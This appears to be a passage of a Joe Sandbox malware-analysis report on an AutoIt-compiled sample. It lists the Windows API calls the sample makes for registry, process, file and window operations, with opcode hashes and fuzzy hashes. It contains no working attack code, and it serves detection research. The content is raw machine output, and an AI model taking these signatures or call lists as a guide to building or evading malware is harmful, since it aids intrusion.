                                                                                                                • Opcode Fuzzy Hash: c16dc05a57fa3b1041d809b49dd77f396263542eb708729d0b60472f27a6fd38
                                                                                                                • Instruction Fuzzy Hash: 6921A479611219AF9B14AFA8DC88DBFB3ECEB09374B408125F905DB291D770EC958B60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 002031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002031DA
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00246A2B
                                                                                                                • _wcscmp.LIBCMT ref: 00246A49
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00246A62
                                                                                                                  • Part of subcall function 00246D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00246DBA
                                                                                                                  • Part of subcall function 00246D6D: GetLastError.KERNEL32 ref: 00246DC5
                                                                                                                  • Part of subcall function 00246D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00246DD9
                                                                                                                • _wcscat.LIBCMT ref: 00246AA4
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00246B0C
                                                                                                                Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 2323102230-1173974218
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0024180D
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00241833
• SysAllocString.OLEAUT32(00000000), ref: 00241836
• SysAllocString.OLEAUT32 ref: 00241857
• SysFreeString.OLEAUT32 ref: 00241860
• StringFromGUID2.OLE32(?,?,00000028), ref: 0024187A
• SysAllocString.OLEAUT32(?), ref: 00241888
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
  • Part of subcall function 0021C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
  • Part of subcall function 0021C619: GetStockObject.GDI32(00000011), ref: 0021C66B
  • Part of subcall function 0021C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0026A13B
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0026A148
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0026A153
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0026A162
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0026A16E
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
• _memset.LIBCMT ref: 0026E14D
• _memset.LIBCMT ref: 0026E15C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,002C3EE0,002C3F24), ref: 0026E18B
• CloseHandle.KERNEL32 ref: 0026E19D
Strings
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: $?,$>,
• API String ID: 3277943733-2698479111
APIs
• GetClientRect.USER32(?,?), ref: 0021C6C0
• GetWindowRect.USER32(?,?), ref: 0021C701
• ScreenToClient.USER32(?,?), ref: 0021C729
• GetClientRect.USER32(?,?), ref: 0021C856
• GetWindowRect.USER32(?,?), ref: 0021C86F
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
APIs
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
  • Part of subcall function 00263AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00262AA6,?,?), ref: 00263B0E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00262FA0
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00262FE0
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00263003
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0026302C
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0026306F
• RegCloseKey.ADVAPI32(00000000), ref: 0026307C
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
APIs
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
APIs
• VariantInit.OLEAUT32(?), ref: 00242AF6
• VariantClear.OLEAUT32(00000013), ref: 00242B68
• VariantClear.OLEAUT32(00000000), ref: 00242BC3
• _memmove.LIBCMT ref: 00242BED
• VariantClear.OLEAUT32(?), ref: 00242C3A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00242C68
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
APIs
• GetMenu.USER32(?), ref: 0026833D
• GetMenuItemCount.USER32(00000000), ref: 00268374
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0026839C
• GetMenuItemID.USER32(?,?), ref: 0026840B
• GetSubMenu.USER32(?,?), ref: 00268419
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0026846A
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
APIs
• _memset.LIBCMT ref: 0024552E
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00245579
• IsMenu.USER32(00000000), ref: 00245599
• CreatePopupMenu.USER32 ref: 002455CD
• GetMenuItemCount.USER32(000000FF), ref: 0024562B
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 0024565C
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
APIs
  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
• BeginPaint.USER32(?,?,?,?,?,?), ref: 0021B1C1
• GetWindowRect.USER32(?,?), ref: 0021B225
• ScreenToClient.USER32(?,?), ref: 0021B242
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0021B253
• EndPaint.USER32(?,?), ref: 0021B29D
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
APIs
• ShowWindow.USER32(002C1810,00000000,?,?,002C1810,002C1810,?,0027E2D6), ref: 0026E21B
• EnableWindow.USER32(?,00000000), ref: 0026E23F
• ShowWindow.USER32(002C1810,00000000,?,?,002C1810,002C1810,?,0027E2D6), ref: 0026E29F
• ShowWindow.USER32(?,00000004,?,?,002C1810,002C1810,?,0027E2D6), ref: 0026E2B1
• EnableWindow.USER32(?,00000001), ref: 0026E2D5
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 0026E2F8
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0023BCD9
• OpenProcessToken.ADVAPI32(00000000), ref: 0023BCE0
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0023BCEF
• CloseHandle.KERNEL32(00000004), ref: 0023BCFA
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0023BD29
• DestroyEnvironmentBlock.USERENV(00000000), ref: 0023BD3D
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
APIs
  • Part of subcall function 0021B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0021B5EB
  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B5FA
  • Part of subcall function 0021B58B: BeginPath.GDI32(?), ref: 0021B611
  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B63B
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0026E9F2
• LineTo.GDI32(00000000,00000003,?), ref: 0026EA06
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0026EA14
• LineTo.GDI32(00000000,00000000,?), ref: 0026EA24
• EndPath.GDI32(00000000), ref: 0026EA34
• StrokePath.GDI32(00000000), ref: 0026EA44
                                                                                                                Similarity
                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 43455801-0
                                                                                                                • Opcode ID: 0a8891dfda57af4b6bd7182c44de197ef05f57385640bb350aabcfadcdb6e2b9
                                                                                                                • Instruction ID: 2cbaaccf56e3f6ca86dc75c5a81b8803e5bfb2361049211a9f980c29e5318f1e
                                                                                                                • Opcode Fuzzy Hash: 0a8891dfda57af4b6bd7182c44de197ef05f57385640bb350aabcfadcdb6e2b9
                                                                                                                • Instruction Fuzzy Hash: 9E110C7A001149BFEF029F94EC88E9A7FADEF04350F048021FE09591A1D7719D69DBA0
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 0023EFB6
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0023EFC7
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0023EFCE
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0023EFD6
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0023EFED
                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0023EFFF
                                                                                                                  • Part of subcall function 0023A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,0023A79D,00000000,00000000,?,0023AB73), ref: 0023B2CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 603618608-0
                                                                                                                • Opcode ID: 2486b1591e430bc2c1fa76199b260a5496f4f65967b8c4e9c93a29859ee75d09
                                                                                                                • Instruction ID: f2a11b7ece32227e2f31c1b46973b252d49843ef9164ec2919e7c36077bf3a65
                                                                                                                • Opcode Fuzzy Hash: 2486b1591e430bc2c1fa76199b260a5496f4f65967b8c4e9c93a29859ee75d09
                                                                                                                • Instruction Fuzzy Hash: 2E0184B5A01219BFEF109BA5AC49B5EBFB8EF48751F004066FE04AB2D0D6709C14CF61
                                                                                                                APIs
                                                                                                                • __init_pointers.LIBCMT ref: 002287D7
                                                                                                                  • Part of subcall function 00221E5A: __initp_misc_winsig.LIBCMT ref: 00221E7E
                                                                                                                  • Part of subcall function 00221E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00228BE1
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00228BF5
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00228C08
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00228C1B
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00228C2E
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00228C41
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00228C54
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00228C67
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00228C7A
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00228C8D
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00228CA0
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00228CB3
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00228CC6
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00228CD9
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00228CEC
                                                                                                                  • Part of subcall function 00221E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00228CFF
                                                                                                                • __mtinitlocks.LIBCMT ref: 002287DC
                                                                                                                  • Part of subcall function 00228AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(002BAC68,00000FA0,?,?,002287E1,00226AFA,002B67D8,00000014), ref: 00228AD1
                                                                                                                • __mtterm.LIBCMT ref: 002287E5
                                                                                                                  • Part of subcall function 0022884D: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002287EA,00226AFA,002B67D8,00000014), ref: 002289CF
                                                                                                                  • Part of subcall function 0022884D: _free.LIBCMT ref: 002289D6
                                                                                                                  • Part of subcall function 0022884D: DeleteCriticalSection.KERNEL32(002BAC68,?,?,002287EA,00226AFA,002B67D8,00000014), ref: 002289F8
                                                                                                                • __calloc_crt.LIBCMT ref: 0022880A
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00228833
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2942034483-0
                                                                                                                • Opcode ID: d4cb1c930692dbeb20ef855344d778cc7efa343cd3edff493faf771abe658991
                                                                                                                • Instruction ID: 561ea90463a4c8b7261a9f3e0d2c8c432a526187a2183ab9ffda0c86a636b1fd
                                                                                                                • Opcode Fuzzy Hash: d4cb1c930692dbeb20ef855344d778cc7efa343cd3edff493faf771abe658991
                                                                                                                • Instruction Fuzzy Hash: 89F0B43353B7327AE2247FF87C0BA4A26C48F01730B614A2AF464D90E2FF11D8714952
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1423608774-0
                                                                                                                • Opcode ID: c53d9f4274c5088db4a7c28922ee6238e8b2d785603c5a95feca93fecf72e3bd
                                                                                                                • Instruction ID: 68347626e7b241c9e41b9a8716294e0f1739333bae8d8a2d526619a1acfb4705
                                                                                                                • Opcode Fuzzy Hash: c53d9f4274c5088db4a7c28922ee6238e8b2d785603c5a95feca93fecf72e3bd
                                                                                                                • Instruction Fuzzy Hash: C401813A152612ABD7192F54FD8CDEB7B7AFF89712B000569F903920A6DB60A814CB51
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00201898
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 002018A0
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 002018AB
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 002018B6
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 002018BE
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 002018C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: 40af35908db36e3a63ba8db9ab3cabb41b74f90340c7f9851ebdbe3453f991cc
                                                                                                                • Instruction ID: c47299f0c59b0fe6443dc91aaad4d730a3a843bfced34d51d0ac1f147b56fc98
                                                                                                                • Opcode Fuzzy Hash: 40af35908db36e3a63ba8db9ab3cabb41b74f90340c7f9851ebdbe3453f991cc
                                                                                                                • Instruction Fuzzy Hash: 630148B0902B597DE3008F6A8C85A52FFA8FF15354F04411B915C47941C7B5A864CBE5
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00248504
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0024851A
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00248529
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00248538
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00248542
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00248549
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: 3f9ce575d84980755258eaf6a04d0b10af4e28c3a57ac3d29b964591c48fb602
                                                                                                                • Instruction ID: f57a9f5955abff78a686c453766d91029d5fee5556bbd65da5cf7965d9aa07c2
                                                                                                                • Opcode Fuzzy Hash: 3f9ce575d84980755258eaf6a04d0b10af4e28c3a57ac3d29b964591c48fb602
                                                                                                                • Instruction Fuzzy Hash: 62F03076242169BBE7215B52BD0EEEF7B7CDFC6B15F000158FA05D1090E7A06A05C7B5
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0024A330
                                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A341
                                                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A34E
                                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A35B
                                                                                                                  • Part of subcall function 00249CCE: CloseHandle.KERNEL32(?,?,0024A368,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 00249CD8
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0024A36E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,002766D3,?,?,?,?,?,0020E681), ref: 0024A375
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 3495660284-0
                                                                                                                • Opcode ID: 6132b1d9a5c90286594e265059bf67d6eaab6d1433dcf43e356852a5c8970162
                                                                                                                • Instruction ID: 48c4e31689f6cf28e57a5cdeafd5fa6cb9f3947a3fe14e143e8cfe39f27a3f0b
                                                                                                                • Opcode Fuzzy Hash: 6132b1d9a5c90286594e265059bf67d6eaab6d1433dcf43e356852a5c8970162
                                                                                                                • Instruction Fuzzy Hash: 04F0E23A042202ABD3152F64FC8CDDB7B7AFF89312B000061F603910F6DBB09814CB50
                                                                                                                APIs
                                                                                                                • _memmove.LIBCMT ref: 0020C419
                                                                                                                • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00246653,?,?,00000000), ref: 0020C495
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead_memmove
                                                                                                                • String ID: Sf$
                                                                                                                • API String ID: 1325644223-2652856587
                                                                                                                • Opcode ID: c12c2cb008647b558e0b01e5acb79f2a69999c3b06303a984be454248af73f4f
                                                                                                                • Instruction ID: cd36422ad00cf7ab8f8f6a21ab54038dcf7ca5957634495b34fbbb5908c8eb47
                                                                                                                • Opcode Fuzzy Hash: c12c2cb008647b558e0b01e5acb79f2a69999c3b06303a984be454248af73f4f
                                                                                                                • Instruction Fuzzy Hash: F0A1EEB0A24209EBDB00DF55C884BADFBB4FF05300F24C295E8699A282D775E970DB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022010A: std::exception::exception.LIBCMT ref: 0022013E
                                                                                                                  • Part of subcall function 0022010A: __CxxThrowException@8.LIBCMT ref: 00220153
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                  • Part of subcall function 0020BBD9: _memmove.LIBCMT ref: 0020BC33
                                                                                                                • __swprintf.LIBCMT ref: 0021D98F
                                                                                                                Strings
                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0021D832
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                • API String ID: 1943609520-557222456
                                                                                                                • Opcode ID: ee938d0d3ab7eadcfb6a62a886215ecdef33126bfa2a6a302499d32067948255
                                                                                                                • Instruction ID: f624a19a51bb938e631bf72b1e5470e8a9005bab7f2f2f06afaf0203ab3c40a3
                                                                                                                • Opcode Fuzzy Hash: ee938d0d3ab7eadcfb6a62a886215ecdef33126bfa2a6a302499d32067948255
                                                                                                                • Instruction Fuzzy Hash: F7915A71528312EFC714EF24C885CAAB7F5AF95700F004959F88A972A2DB70EE65CF52
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0025B4A8
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 0025B5B7
                                                                                                                • VariantClear.OLEAUT32(?), ref: 0025B73A
                                                                                                                  • Part of subcall function 0024A6F6: VariantInit.OLEAUT32(00000000), ref: 0024A736
                                                                                                                  • Part of subcall function 0024A6F6: VariantCopy.OLEAUT32(?,?), ref: 0024A73F
                                                                                                                  • Part of subcall function 0024A6F6: VariantClear.OLEAUT32(?), ref: 0024A74B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
